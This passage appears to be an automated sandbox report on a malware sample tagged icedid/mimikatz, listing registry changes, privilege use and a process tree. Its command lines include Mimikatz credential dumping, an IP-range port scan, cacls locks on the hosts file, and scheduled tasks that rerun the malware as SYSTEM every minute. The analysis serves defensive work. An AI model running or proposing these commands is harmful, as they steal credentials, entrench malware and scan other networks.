\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rwdxwq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ulchjqs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ulchjqs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zihpsbpfp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2772 cmd.exe 1616 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000b000000023b91-6.dat nsis_installer_2 behavioral2/files/0x000e000000023a61-15.dat nsis_installer_1 behavioral2/files/0x000e000000023a61-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 39 IoCs
Processes:
iqykpunep.exeiqykpunep.exeiqykpunep.exeulchjqs.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ulchjqs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ulchjqs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ulchjqs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ulchjqs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ulchjqs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iqykpunep.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ulchjqs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iqykpunep.exe -
Modifies registry class 14 IoCs
Processes:
ulchjqs.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ulchjqs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ulchjqs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ulchjqs.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3844 schtasks.exe 4000 schtasks.exe 4340 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ulchjqs.exepid Process 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 636 636 636 636 636 636 636 636 636 636 636 636 636 636 636 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exepid Process 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exeulchjqs.exeulchjqs.exevfshost.exeiqykpunep.exektqkck.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exeiqykpunep.exedescription pid Process Token: SeDebugPrivilege 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4672 ulchjqs.exe Token: SeDebugPrivilege 212 ulchjqs.exe Token: SeDebugPrivilege 2940 vfshost.exe Token: SeDebugPrivilege 1464 iqykpunep.exe Token: SeLockMemoryPrivilege 544 ktqkck.exe Token: SeLockMemoryPrivilege 544 ktqkck.exe Token: SeDebugPrivilege 1648 iqykpunep.exe Token: SeDebugPrivilege 3700 iqykpunep.exe Token: SeDebugPrivilege 4764 iqykpunep.exe Token: SeDebugPrivilege 2076 iqykpunep.exe Token: SeDebugPrivilege 4936 iqykpunep.exe Token: SeDebugPrivilege 4608 iqykpunep.exe Token: SeDebugPrivilege 4032 iqykpunep.exe Token: SeDebugPrivilege 4812 iqykpunep.exe Token: SeDebugPrivilege 1612 iqykpunep.exe Token: SeDebugPrivilege 5096 iqykpunep.exe Token: SeDebugPrivilege 3940 iqykpunep.exe Token: SeDebugPrivilege 1196 iqykpunep.exe Token: SeDebugPrivilege 2368 iqykpunep.exe Token: SeDebugPrivilege 3868 iqykpunep.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exeulchjqs.exeulchjqs.exexohudmc.exerwdxwq.exeulchjqs.exepid Process 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe 4672 ulchjqs.exe 4672 ulchjqs.exe 212 ulchjqs.exe 212 ulchjqs.exe 1492 xohudmc.exe 920 rwdxwq.exe 1496 ulchjqs.exe 1496 ulchjqs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.execmd.exeulchjqs.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 4876 wrote to memory of 2772 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe 87 PID 4876 wrote to memory of 2772 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe 87 PID 4876 wrote to memory of 2772 4876 2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe 87 PID 2772 wrote to memory of 1616 2772 cmd.exe 89 PID 2772 wrote to memory of 1616 2772 cmd.exe 89 PID 2772 wrote to memory of 1616 2772 cmd.exe 89 PID 2772 wrote to memory of 4672 2772 cmd.exe 91 PID 2772 wrote to memory of 4672 2772 cmd.exe 91 PID 2772 wrote to memory of 4672 2772 cmd.exe 91 PID 212 wrote to memory of 1632 212 ulchjqs.exe 93 PID 212 wrote to memory of 1632 212 ulchjqs.exe 93 PID 212 wrote to memory of 1632 212 ulchjqs.exe 93 PID 1632 wrote to memory of 3340 1632 cmd.exe 95 PID 1632 wrote to memory of 3340 1632 cmd.exe 95 PID 1632 wrote to memory of 3340 1632 cmd.exe 95 PID 1632 wrote to memory of 4756 1632 cmd.exe 96 PID 1632 wrote to memory of 4756 1632 cmd.exe 96 PID 1632 wrote to memory of 4756 1632 cmd.exe 96 PID 1632 wrote to memory of 3964 1632 cmd.exe 97 PID 1632 wrote to memory of 3964 1632 cmd.exe 97 PID 1632 wrote to memory of 3964 1632 cmd.exe 97 PID 1632 wrote to memory of 2452 1632 cmd.exe 98 PID 1632 wrote to memory of 2452 1632 cmd.exe 98 PID 1632 wrote to memory of 2452 1632 cmd.exe 98 PID 1632 wrote to memory of 2600 1632 cmd.exe 99 PID 1632 wrote to memory of 2600 1632 cmd.exe 99 PID 1632 wrote to memory of 2600 1632 cmd.exe 99 PID 1632 wrote to memory of 2776 1632 cmd.exe 100 PID 1632 wrote to memory of 2776 1632 cmd.exe 100 PID 1632 wrote to memory of 2776 1632 cmd.exe 100 PID 212 wrote to memory of 1772 212 ulchjqs.exe 102 PID 212 wrote to memory of 1772 212 ulchjqs.exe 102 PID 212 wrote to memory of 1772 212 ulchjqs.exe 102 PID 212 wrote to memory of 400 212 ulchjqs.exe 104 PID 212 wrote to memory of 400 212 ulchjqs.exe 104 PID 212 wrote to memory of 400 212 ulchjqs.exe 104 PID 212 wrote to memory of 2912 212 ulchjqs.exe 106 PID 212 wrote to memory of 2912 212 ulchjqs.exe 106 PID 212 wrote to memory of 2912 212 ulchjqs.exe 106 PID 212 wrote to memory of 408 212 ulchjqs.exe 112 PID 212 wrote to memory of 408 212 ulchjqs.exe 112 PID 212 wrote to memory of 408 212 ulchjqs.exe 112 PID 408 wrote to memory of 4412 408 cmd.exe 114 PID 408 wrote to memory of 4412 408 cmd.exe 114 PID 408 wrote to memory of 4412 408 cmd.exe 114 PID 4412 wrote to memory of 836 4412 wpcap.exe 115 PID 4412 wrote to memory of 836 4412 wpcap.exe 115 PID 4412 wrote to memory of 836 4412 wpcap.exe 115 PID 836 wrote to memory of 1640 836 net.exe 117 PID 836 wrote to memory of 1640 836 net.exe 117 PID 836 wrote to memory of 1640 836 net.exe 117 PID 4412 wrote to memory of 3664 4412 wpcap.exe 118 PID 4412 wrote to memory of 3664 4412 wpcap.exe 118 PID 4412 wrote to memory of 3664 4412 wpcap.exe 118 PID 3664 wrote to memory of 1980 3664 net.exe 120 PID 3664 wrote to memory of 1980 3664 net.exe 120 PID 3664 wrote to memory of 1980 3664 net.exe 120 PID 4412 wrote to memory of 4348 4412 wpcap.exe 121 PID 4412 wrote to memory of 4348 4412 wpcap.exe 121 PID 4412 wrote to memory of 4348 4412 wpcap.exe 121 PID 4348 wrote to memory of 2132 4348 net.exe 123 PID 4348 wrote to memory of 2132 4348 net.exe 123 PID 4348 wrote to memory of 2132 4348 net.exe 123 PID 4412 wrote to memory of 2836 4412 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\TEMP\efikiqkpu\ktqkck.exe"C:\Windows\TEMP\efikiqkpu\ktqkck.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-14_6d5d08d435f227019b797da24fbdebfd_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tqgebhig\ulchjqs.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1616
-
-
C:\Windows\tqgebhig\ulchjqs.exeC:\Windows\tqgebhig\ulchjqs.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4672
-
-
-
C:\Windows\tqgebhig\ulchjqs.exeC:\Windows\tqgebhig\ulchjqs.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3340
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3964
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2600
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2776
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1772
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:400
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2912
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gktnbpatc\qkbhvgseb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\gktnbpatc\qkbhvgseb\wpcap.exeC:\Windows\gktnbpatc\qkbhvgseb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1640
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2132
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3992
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4608
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4360
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4308 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3088
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gktnbpatc\qkbhvgseb\uppqklzyi.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gktnbpatc\qkbhvgseb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4276 -
C:\Windows\gktnbpatc\qkbhvgseb\uppqklzyi.exeC:\Windows\gktnbpatc\qkbhvgseb\uppqklzyi.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gktnbpatc\qkbhvgseb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gktnbpatc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gktnbpatc\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2564 -
C:\Windows\gktnbpatc\Corporate\vfshost.exeC:\Windows\gktnbpatc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ksgtjyzmc" /ru system /tr "cmd /c C:\Windows\ime\ulchjqs.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ksgtjyzmc" /ru system /tr "cmd /c C:\Windows\ime\ulchjqs.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltlituhps" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tqgebhig\ulchjqs.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ltlituhps" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tqgebhig\ulchjqs.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "llfnqtetc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\efikiqkpu\ktqkck.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3288 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "llfnqtetc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\efikiqkpu\ktqkck.exe /p everyone:F"3⤵
